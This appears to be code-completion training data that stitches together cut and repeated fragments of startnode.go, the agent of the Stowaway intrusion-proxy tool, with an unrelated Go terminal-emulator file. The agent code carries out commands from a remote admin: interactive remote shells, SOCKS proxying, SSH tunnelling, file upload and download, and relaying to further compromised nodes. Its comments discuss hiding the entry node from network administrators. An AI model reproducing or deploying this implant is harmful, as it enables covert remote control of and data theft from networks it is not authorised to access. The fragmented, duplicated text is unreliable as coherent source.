respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESLICENUMCONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSliceNum <- true
case "FILESLICENUMCONFIRM":
share.File.TotalConfirm <- true
case "FILESIZECONFIRM":
share.File.TotalConfirm <- true
case "DOWNLOADFILE":
go share.UploadFile("", AdminData.Info, connToAdmin, utils.AdminId, GetName, AgentStatus.AESKey, NODEID, false)
case "NAMECONFIRM":
GetName <- true
case "CREATEFAIL":
GetName <- false
case "CANNOTREAD":
CannotRead <- true
share.File.ReceiveFileSliceNum <- false
os.Remove(AdminData.Info) //删除空文件
case "FORWARDTEST":
go TestForward(AdminData.Info)
case "REFLECTTEST":
go TestReflect(AdminData.Info)
case "REFLECTNUM":
ReflectStatus.ReflectNum <- AdminData.Clientid
case "STOPREFLECT":
ReflectConnMap.Lock()
for key, conn := range ReflectConnMap.Payload {
conn.Close()
delete(ForwardConnMap.Payload, key)
}
ReflectConnMap.Unlock()
for _, listener := range CurrentPortReflectListener {
listener.Close()
}
case "LISTEN":
err := TestListen(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "FAILED", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "SUCCESS", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go node.StartNodeListen(AdminData.Info, NODEID, AgentStatus.AESKey)
}
case "YOURINFO": //接收note
AgentStatus.NodeNote = AdminData.Info
case "KEEPALIVE":
default:
continue
}
} | } else {
// 检查是否是admin发来的,分配给自己子节点的ID命令,是的话将admin分配的序号记录
if AdminData.Route == "" && AdminData.Command == "ID" {
AgentStatus.WaitForIDAllocate <- AdminData.NodeId //将此节点序号递交,以便启动HandleConnFromLowerNode函数
node.NodeInfo.LowerNode.Lock()
node.NodeInfo.LowerNode.Payload[AdminData.NodeId] = node.NodeInfo.LowerNode.Payload[utils.AdminId]
node.NodeInfo.LowerNode.Unlock()
}
routeid := ChangeRoute(AdminData) //更改路由并返回下一个路由点
proxyData, _ := utils.ConstructPayload(AdminData.NodeId, AdminData.Route, AdminData.Type, AdminData.Command, AdminData.FileSliceNum, AdminData.Info, AdminData.Clientid, AdminData.CurrentId, AgentStatus.AESKey, true)
passToLowerData := utils.NewPassToLowerNodeData()
if routeid == "" { //当返回的路由点为0,说明就是自己的子节点
passToLowerData.Route = AdminData.NodeId
} else { //不是0,说明不是自己的子节点,还需要一定轮数的递送
passToLowerData.Route = routeid
}
passToLowerData.Data = proxyData //封装结构体,交给HandleConnToLowerNode处理
ProxyChan.ProxyChanToLowerNode <- passToLowerData
}
}
} | random_line_split | |
startnode.go | package agent
import (
"fmt"
"io"
"net"
"os"
"strconv"
"strings"
"Stowaway/node"
"Stowaway/share"
"Stowaway/utils"
)
//startnode启动代码
//todo:可以为startnode加入一个保护机制,在startnode启动时可以设置是否开启此机制
//即当有节点异常断线时,可设置是否让startnode暂时断开与第二级节点的连接
//防止异常断线是由于管理员发现节点引起的,并根据connection进行逐点反查从而顺藤摸瓜找到入口点startnode,使得渗透测试者失去内网的入口点
//先暂时不加入,权当一个胡思乱想的idea,今后可视情况增加对startnode保护机制的处理代码,使得入口点更加稳固和隐蔽
func HandleStartNodeConn(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
go HandleConnFromAdmin(connToAdmin, monitor, listenPort, reConn, passive, NODEID)
go HandleConnToAdmin(connToAdmin)
}
//管理startnode发往admin的数据
func HandleConnToAdmin(connToAdmin *net.Conn) {
for {
proxyData := <-ProxyChan.ProxyChanToUpperNode
_, err := (*connToAdmin).Write(proxyData)
if err != nil {
continue
}
}
}
//管理admin端下发的数据
func HandleConnFromAdmin(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
var (
CannotRead = make(chan bool, 1)
GetName = make(chan bool, 1)
stdin io.Writer
stdout io.Reader
)
for {
AdminData, err := utils.ExtractPayload(*connToAdmin, AgentStatus.AESKey, NODEID, false)
if err != nil {
AdminO | tor, listenPort, passive)
go SendInfo(NODEID) //重连后发送自身信息
go SendNote(NODEID) //重连后发送admin设置的备忘
continue
}
if AdminData.NodeId == NODEID {
switch AdminData.Type {
case "DATA":
switch AdminData.Command {
case "SOCKSDATA":
SocksDataChanMap.RLock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.RUnlock()
} else {
SocksDataChanMap.RUnlock()
SocksDataChanMap.Lock()
SocksDataChanMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HanleClientSocksConn(SocksDataChanMap.Payload[AdminData.Clientid], SocksInfo.SocksUsername, SocksInfo.SocksPass, AdminData.Clientid, NODEID)
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.Unlock()
}
case "FILEDATA": //接收文件内容
slicenum, _ := strconv.Atoi(AdminData.FileSliceNum)
FileDataMap.Lock()
FileDataMap.Payload[slicenum] = AdminData.Info
FileDataMap.Unlock()
case "FORWARD":
TryForward(AdminData.Info, AdminData.Clientid)
case "FORWARDDATA":
ForwardConnMap.RLock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
} else {
PortFowardMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HandleForward(PortFowardMap.Payload[AdminData.Clientid], AdminData.Clientid)
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
}
PortFowardMap.Unlock()
}
ForwardConnMap.RUnlock()
case "FORWARDFIN":
ForwardConnMap.Lock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
ForwardConnMap.Payload[AdminData.Clientid].Close()
delete(ForwardConnMap.Payload, AdminData.Clientid)
}
ForwardConnMap.Unlock()
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
close(PortFowardMap.Payload[AdminData.Clientid])
}
delete(PortFowardMap.Payload, AdminData.Clientid)
}
}
PortFowardMap.Unlock()
case "REFLECTDATARESP":
ReflectConnMap.Lock()
ReflectConnMap.Payload[AdminData.Clientid].Write([]byte(AdminData.Info))
ReflectConnMap.Unlock()
case "REFLECTTIMEOUT":
fallthrough
case "REFLECTOFFLINE":
ReflectConnMap.Lock()
if _, ok := ReflectConnMap.Payload[AdminData.Clientid]; ok {
ReflectConnMap.Payload[AdminData.Clientid].Close()
delete(ReflectConnMap.Payload, AdminData.Clientid)
}
ReflectConnMap.Unlock()
case "FINOK":
SocksDataChanMap.Lock() //性能损失?
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "FIN":
CurrentConn.Lock()
if _, ok := CurrentConn.Payload[AdminData.Clientid]; ok {
CurrentConn.Payload[AdminData.Clientid].Close()
delete(CurrentConn.Payload, AdminData.Clientid)
}
CurrentConn.Unlock()
SocksDataChanMap.Lock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "HEARTBEAT":
hbdatapack, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "KEEPALIVE", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- hbdatapack
default:
continue
}
case "COMMAND":
switch AdminData.Command {
case "SHELL":
switch AdminData.Info {
case "":
stdout, stdin = CreatInteractiveShell()
go func() {
StartShell("", stdin, stdout, NODEID)
}()
case "exit\n":
fallthrough
default:
go func() {
StartShell(AdminData.Info, stdin, stdout, NODEID)
}()
}
case "SOCKS":
socksinfo := strings.Split(AdminData.Info, ":::")
SocksInfo.SocksUsername = socksinfo[1]
SocksInfo.SocksPass = socksinfo[2]
StartSocks()
case "SOCKSOFF":
case "SSH":
err := StartSSH(AdminData.Info, NODEID)
if err == nil {
go ReadCommand()
} else {
break
}
case "SSHCOMMAND":
go WriteCommand(AdminData.Info)
case "SSHTUNNEL":
err := SSHTunnelNextNode(AdminData.Info, NODEID)
if err != nil {
fmt.Println("[*]", err)
break
}
case "CONNECT":
var status bool = false
command := strings.Split(AdminData.Info, ":::")
addr := command[0]
choice := command[1]
if choice == "1" { //连接的节点是否是在reuseport?
status = node.ConnectNextNodeReuse(addr, NODEID, AgentStatus.AESKey)
} else {
status = node.ConnectNextNode(addr, NODEID, AgentStatus.AESKey)
}
if !status {
message, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NODECONNECTFAIL", " ", "", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- message
}
case "FILENAME":
var err error
UploadFile, err := os.Create(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "CREATEFAIL", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NAMECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go share.ReceiveFile("", connToAdmin, FileDataMap, CannotRead, UploadFile, AgentStatus.AESKey, false, NODEID)
}
case "FILESIZE":
filesize, _ := strconv.ParseInt(AdminData.Info, 10, 64)
share.File.FileSize = filesize
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESIZECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSize <- true
case "FILESLICENUM":
share.File.TotalSilceNum, _ = strconv.Atoi(AdminData.Info)
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESLICENUMCONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSliceNum <- true
case "FILESLICENUMCONFIRM":
share.File.TotalConfirm <- true
case "FILESIZECONFIRM":
share.File.TotalConfirm <- true
case "DOWNLOADFILE":
go share.UploadFile("", AdminData.Info, connToAdmin, utils.AdminId, GetName, AgentStatus.AESKey, NODEID, false)
case "NAMECONFIRM":
GetName <- true
case "CREATEFAIL":
GetName <- false
case "CANNOTREAD":
CannotRead <- true
share.File.ReceiveFileSliceNum <- false
os.Remove(AdminData.Info) //删除空文件
case "FORWARDTEST":
go TestForward(AdminData.Info)
case "REFLECTTEST":
go TestReflect(AdminData.Info)
case "REFLECTNUM":
ReflectStatus.ReflectNum <- AdminData.Clientid
case "STOPREFLECT":
ReflectConnMap.Lock()
for key, conn := range ReflectConnMap.Payload {
conn.Close()
delete(ForwardConnMap.Payload, key)
}
ReflectConnMap.Unlock()
for _, listener := range CurrentPortReflectListener {
listener.Close()
}
case "LISTEN":
err := TestListen(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "FAILED", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "SUCCESS", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go node.StartNodeListen(AdminData.Info, NODEID, AgentStatus.AESKey)
}
case "YOURINFO": //接收note
AgentStatus.NodeNote = AdminData.Info
case "KEEPALIVE":
default:
continue
}
}
} else {
// 检查是否是admin发来的,分配给自己子节点的ID命令,是的话将admin分配的序号记录
if AdminData.Route == "" && AdminData.Command == "ID" {
AgentStatus.WaitForIDAllocate <- AdminData.NodeId //将此节点序号递交,以便启动HandleConnFromLowerNode函数
node.NodeInfo.LowerNode.Lock()
node.NodeInfo.LowerNode.Payload[AdminData.NodeId] = node.NodeInfo.LowerNode.Payload[utils.AdminId]
node.NodeInfo.LowerNode.Unlock()
}
routeid := ChangeRoute(AdminData) //更改路由并返回下一个路由点
proxyData, _ := utils.ConstructPayload(AdminData.NodeId, AdminData.Route, AdminData.Type, AdminData.Command, AdminData.FileSliceNum, AdminData.Info, AdminData.Clientid, AdminData.CurrentId, AgentStatus.AESKey, true)
passToLowerData := utils.NewPassToLowerNodeData()
if routeid == "" { //当返回的路由点为0,说明就是自己的子节点
passToLowerData.Route = AdminData.NodeId
} else { //不是0,说明不是自己的子节点,还需要一定轮数的递送
passToLowerData.Route = routeid
}
passToLowerData.Data = proxyData //封装结构体,交给HandleConnToLowerNode处理
ProxyChan.ProxyChanToLowerNode <- passToLowerData
}
}
}
| ffline(reConn, moni | identifier_name |
startnode.go | package agent
import (
"fmt"
"io"
"net"
"os"
"strconv"
"strings"
"Stowaway/node"
"Stowaway/share"
"Stowaway/utils"
)
//startnode启动代码
//todo:可以为startnode加入一个保护机制,在startnode启动时可以设置是否开启此机制
//即当有节点异常断线时,可设置是否让startnode暂时断开与第二级节点的连接
//防止异常断线是由于管理员发现节点引起的,并根据connection进行逐点反查从而顺藤摸瓜找到入口点startnode,使得渗透测试者失去内网的入口点
//先暂时不加入,权当一个胡思乱想的idea,今后可视情况增加对startnode保护机制的处理代码,使得入口点更加稳固和隐蔽
func HandleStartNodeConn(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
go HandleConnFromAdmin(connToAdmin, monitor, listenPort, reConn, passive, NODEID)
go HandleConnToAdmin(connToAdmin)
}
//管理startnode发往admin的数据
func HandleConnToAdmin(connToAdmin *net.Conn) {
for {
proxyData := <-ProxyChan.ProxyChanToUpperNode
_, err := (*connToAdmin).Write(proxyData)
if err != nil {
continue
}
}
}
//管理admin端下发的数据
func HandleConnFromAdmin(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
var (
CannotRead = make(chan bool, 1)
GetName = make(chan bool, 1)
stdin io.Writer
stdout io.Reader
)
for {
AdminData, err := utils.ExtractPayload(*connToAdmin, AgentStatus.AESKey, NODEID, false)
if err != nil {
AdminOffline(reConn, monitor, listenPort, passive)
go SendInfo(NODEID) //重连后发送自身信息
go SendNote(NODEID) //重连后发送admin设置的备忘
continue
}
if AdminData.NodeId == NODEID {
switch AdminData.Type {
case "DATA":
switch AdminData.Command {
case "SOCKSDATA":
SocksDataChanMap.RLock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.RUnlock()
} else {
SocksDataChanMap.RUnlock()
SocksDataChanMap.Lock()
SocksDataChanMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HanleClientSocksConn(SocksDataChanMap.Payload[AdminData.Clientid], SocksInfo.SocksUsername, SocksInfo.SocksPass, AdminData.Clientid, NODEID)
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.Unlock()
}
case "FILEDATA": //接收文件内容
slicenum, _ := strconv.Atoi(AdminData.FileSliceNum)
FileDataMap.Lock()
FileDataMap.Payload[slicenum] = AdminData.Info
FileDataMap.Unlock()
case "FORWARD":
TryForward(AdminData.Info, AdminData.Clientid)
case "FORWARDDATA":
ForwardConnMap.RLock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
} else {
PortFowardMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HandleForward(PortFowardMap.Payload[AdminData.Clientid], AdminData.Clientid)
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
}
PortFowardMap.Unlock()
}
ForwardConnMap.RUnlock()
case "FORWARDFIN":
ForwardConnMap.Lock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
ForwardConnMap.Payload[AdminData.Clientid].Close()
delete(ForwardConnMap.Payload, AdminData.Clientid)
}
ForwardConnMap.Unlock()
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
close(PortFowardMap.Payload[AdminData.Clientid])
}
delete(PortFowardMap.Payload, AdminData.Clientid)
}
}
PortFowardMap.Unlock()
case "REFLECTDATARESP":
ReflectConnMap.Lock()
ReflectConnMap.Payload[AdminData.Clientid].Write([]byte(AdminData.Info))
ReflectConnMap.Unlock()
case "REFLECTTIMEOUT":
fallthrough
case "REFLECTOFFLINE":
ReflectConnMap.Lock()
if _, ok := ReflectConnMap.Payload[AdminData.Clientid]; ok {
ReflectConnMap.Payload[AdminData.Clientid].Close()
delete(ReflectConnMap.Payload, AdminData.Clientid)
}
ReflectConnMap.Unlock()
case "FINOK":
SocksDataChanMap.Lock() //性能损失?
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "FIN":
CurrentConn.Lock()
if _, ok := CurrentConn.Payload[AdminData.Clientid]; ok {
CurrentConn.Payload[AdminData.Clientid].Close()
delete(CurrentConn.Payload, AdminData.Clientid)
}
CurrentConn.Unlock()
SocksDataChanMap.Lock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "HEARTBEAT":
hbdatapack, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "KEEPALIVE", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- hbdatapack
default:
continue
}
case "COMMAND":
switch AdminData.Command {
case "SHELL":
switch AdminData.Info {
case "":
stdout, stdin = CreatInteractiveShell()
go func() {
StartShell("", stdin, stdout, NODEID)
}()
case "exit\n":
fallthrough
default:
go func() {
StartShell(AdminData.Info, stdin, stdout, NODEID)
}()
}
case "SOCKS":
socksinfo := strings.Split(AdminData.Info, ":::")
SocksInfo.SocksUsername = socksinfo[1]
SocksInfo.SocksPass = socksinfo[2]
StartSocks()
case "SOCKSOFF":
case "SSH":
err := StartSSH(AdminData.Info, NODEID)
if err == nil {
go ReadCommand()
} else {
break
}
case "SSHCOMMAND":
go WriteCommand(AdminData.Info)
case "SSHTUNNEL":
err := SSHTunnelNextNode(AdminData.Info, NODEID)
if err != nil {
fmt.Println("[*]", err)
break
}
case "CONNECT":
var status bool = false
command := strings.Split(AdminData.Info, ":::")
addr := command[0]
choice := command[1]
if choice == "1" { //连接的节点是否是在reuseport?
status = node.ConnectNextNodeReuse(addr, NODEID, AgentStatus.AESKey)
} else {
status = node.ConnectNextNode(addr, NODEID, AgentStatus.AESKey)
}
if !status {
message, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NODECONNECTFAIL", " ", "", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- message
}
case "FILENAME":
var err error
UploadFile, err := os.Create(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "CREATEFAIL", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NAMECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go share.ReceiveFile("", connToAdmin, FileDat | respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESIZECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSize <- true
case "FILESLICENUM":
share.File.TotalSilceNum, _ = strconv.Atoi(AdminData.Info)
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESLICENUMCONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSliceNum <- true
case "FILESLICENUMCONFIRM":
share.File.TotalConfirm <- true
case "FILESIZECONFIRM":
share.File.TotalConfirm <- true
case "DOWNLOADFILE":
go share.UploadFile("", AdminData.Info, connToAdmin, utils.AdminId, GetName, AgentStatus.AESKey, NODEID, false)
case "NAMECONFIRM":
GetName <- true
case "CREATEFAIL":
GetName <- false
case "CANNOTREAD":
CannotRead <- true
share.File.ReceiveFileSliceNum <- false
os.Remove(AdminData.Info) //删除空文件
case "FORWARDTEST":
go TestForward(AdminData.Info)
case "REFLECTTEST":
go TestReflect(AdminData.Info)
case "REFLECTNUM":
ReflectStatus.ReflectNum <- AdminData.Clientid
case "STOPREFLECT":
ReflectConnMap.Lock()
for key, conn := range ReflectConnMap.Payload {
conn.Close()
delete(ForwardConnMap.Payload, key)
}
ReflectConnMap.Unlock()
for _, listener := range CurrentPortReflectListener {
listener.Close()
}
case "LISTEN":
err := TestListen(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "FAILED", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "SUCCESS", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go node.StartNodeListen(AdminData.Info, NODEID, AgentStatus.AESKey)
}
case "YOURINFO": //接收note
AgentStatus.NodeNote = AdminData.Info
case "KEEPALIVE":
default:
continue
}
}
} else {
// 检查是否是admin发来的,分配给自己子节点的ID命令,是的话将admin分配的序号记录
if AdminData.Route == "" && AdminData.Command == "ID" {
AgentStatus.WaitForIDAllocate <- AdminData.NodeId //将此节点序号递交,以便启动HandleConnFromLowerNode函数
node.NodeInfo.LowerNode.Lock()
node.NodeInfo.LowerNode.Payload[AdminData.NodeId] = node.NodeInfo.LowerNode.Payload[utils.AdminId]
node.NodeInfo.LowerNode.Unlock()
}
routeid := ChangeRoute(AdminData) //更改路由并返回下一个路由点
proxyData, _ := utils.ConstructPayload(AdminData.NodeId, AdminData.Route, AdminData.Type, AdminData.Command, AdminData.FileSliceNum, AdminData.Info, AdminData.Clientid, AdminData.CurrentId, AgentStatus.AESKey, true)
passToLowerData := utils.NewPassToLowerNodeData()
if routeid == "" { //当返回的路由点为0,说明就是自己的子节点
passToLowerData.Route = AdminData.NodeId
} else { //不是0,说明不是自己的子节点,还需要一定轮数的递送
passToLowerData.Route = routeid
}
passToLowerData.Data = proxyData //封装结构体,交给HandleConnToLowerNode处理
ProxyChan.ProxyChanToLowerNode <- passToLowerData
}
}
}
| aMap, CannotRead, UploadFile, AgentStatus.AESKey, false, NODEID)
}
case "FILESIZE":
filesize, _ := strconv.ParseInt(AdminData.Info, 10, 64)
share.File.FileSize = filesize
| conditional_block |
console.go | package console
import (
"fmt"
"image"
"strconv"
"strings"
"github.com/hajimehoshi/ebiten/v2"
)
type color struct {
R byte
G byte
B byte
}
type char struct {
charID int
fgColor color
bgColor color
blink bool
}
type Console struct {
videoTextMemory [25 * 80]char
fgColor color
bgColor color
auxCursorPos int
cursor int
height int
width int
scale float64
cursorSetBlink bool
cursorBlinkTimer int
tmpScreen *ebiten.Image
img *image.RGBA
title string
font struct {
height int
width int
bitmap []byte
}
}
func (c *Console) Write(p []byte) (n int, err error) {
c.Print(string(p))
return len(p), nil
}
func colorParserFg(i int) (color, bool) {
fg := make(map[int]color, 16)
fg[30] = color{0, 0, 0} // Black
fg[31] = color{170, 0, 0} // Red
fg[32] = color{0, 170, 0} // Green
fg[33] = color{170, 85, 0} // Yellow
fg[34] = color{0, 0, 170} // Blue
fg[35] = color{170, 0, 170} // Magenta
fg[36] = color{0, 170, 170} // Cyan
fg[37] = color{170, 170, 170} // White
fg[90] = color{85, 85, 85} // Bright Black (Gray)
fg[91] = color{255, 85, 85} // Bright Red
fg[92] = color{85, 255, 85} // Bright Green
fg[93] = color{255, 255, 85} // Bright Yellow
fg[94] = color{85, 85, 255} // Bright Blue
fg[95] = color{255, 85, 255} // Bright Magenta
fg[96] = color{85, 255, 255} // Bright Cyan
fg[97] = color{255, 255, 255} // Bright White
c, ok := fg[i]
return c, ok
}
func colorParserBg(i int) (color, bool) {
bg := make(map[int]color, 16)
bg[40] = color{0, 0, 0} // Black
bg[41] = color{170, 0, 0} // Red
bg[42] = color{0, 170, 0} // Green
bg[43] = color{170, 85, 0} // Yellow
bg[44] = color{0, 0, 170} // Blue
bg[45] = color{170, 0, 170} // Magenta
bg[46] = color{0, 170, 170} // Cyan
bg[47] = color{170, 170, 170} // White
bg[100] = color{85, 85, 85} // Bright Black (Gray)
bg[101] = color{255, 85, 85} // Bright Red
bg[102] = color{85, 255, 85} // Bright Green
bg[103] = color{255, 255, 85} // Bright Yellow
bg[104] = color{85, 85, 255} // Bright Blue
bg[105] = color{255, 85, 255} // Bright Magenta
bg[106] = color{85, 255, 255} // Bright Cyan
bg[107] = color{255, 255, 255} // Bright White
c, ok := bg[i]
return c, ok
}
func New() *Console {
c := &Console{}
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
c.width = 80 * 9
c.height = 25 * 16
c.scale = 1.5
c.title = "term"
c.cursorSetBlink = true
c.img = image.NewRGBA(image.Rect(0, 0, c.width, c.height))
c.tmpScreen = ebiten.NewImage(c.width, c.height)
c.font.bitmap = bitmap
c.font.height = 16
c.font.width = 9
c.clear()
return c
}
func (c *Console) Run() (err error) {
// SetRunnableOnUnfocused
ebiten.SetRunnableOnUnfocused(true)
ebiten.SetWindowSize(c.width, c.height)
ebiten.SetWindowTitle(c.title)
err = ebiten.RunGame(c)
return err
}
func (c *Console) input() {
var r rune
for c := 'A'; c <= 'Z'; c++ {
if ebiten.IsKeyPressed(ebiten.Key(c) - 'A' + ebiten.KeyA) {
if ebiten.IsKeyPressed(ebiten.KeyShift) {
r = c
}
r = (c + 32) // convert to lowercase
fmt.Println(string(r))
}
}
}
func (c *Console) Update() error {
c.input()
c.drawText()
return nil
}
func (c *Console) Layout(outsideWidth, outsideHeight int) (int, int) {
return c.width, c.height
}
func (c *Console) Draw(screen *ebiten.Image) {
c.tmpScreen.ReplacePixels(c.img.Pix)
screen.DrawImage(c.tmpScreen, nil)
}
func (c *Console) clear() {
c.cursor = 0
for i := 0; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) drawText() {
i := 0
rows := 25
columns := 80
for row := 0; row < rows; row++ {
for col := 0; col < columns; col++ {
v := c.videoTextMemory[i]
if i == c.cursor {
c.drawCursor(v.charID, v.fgColor, v.bgColor, col, row)
} else {
c.drawChar(v.charID, v.fgColor, v.bgColor, col, row)
}
i++
}
}
}
func (c *Console) moveUp() {
columns := 80
copy(c.videoTextMemory[0:], c.videoTextMemory[columns:])
for i := len(c.videoTextMemory) - columns; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) put(charID int) {
c.videoTextMemory[c.cursor].fgColor = c.fgColor
c.videoTextMemory[c.cursor].bgColor = c.bgColor
c.videoTextMemory[c.cursor].charID = charID
c.cursor++
c.cursorLimit()
}
func (c *Console) cursorLimit() {
if c.cursor < 0 {
c.cursor = 0
return
}
columns := 80
rows := 25
for c.cursor >= rows*columns {
c.cursor -= columns
c.moveUp()
}
}
func (c *Console) Print(msg string) {
columns := 80
parseMode := false
csi := false
s := ""
for i := 0; i < len(msg); i++ {
v := msg[i]
switch {
case v == 7: // bell
// not implemented
case v == 8: // Backspace
c.cursor--
c.cursorLimit()
case v == 9: // tab \t
lin := int(c.cursor / columns)
col := int(c.cursor % columns)
ncol := int(col/4)*4 + 4 // tab size 4 and remove mod
c.cursor = lin*columns + ncol
c.cursorLimit()
case v == 10: // Line Feed, \n
c.cursor += columns
c.cursorLimit()
case v == 11: // Vertical tab
// not implemented
case v == 12: // Formfeed
// not implemented
case v == 13: // Carriage return \r
c.cursor = int(c.cursor/columns) * columns
c.cursorLimit()
case v == 27:
parseMode = true
case v == '7' && parseMode: // DEC primitive save cursor position
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
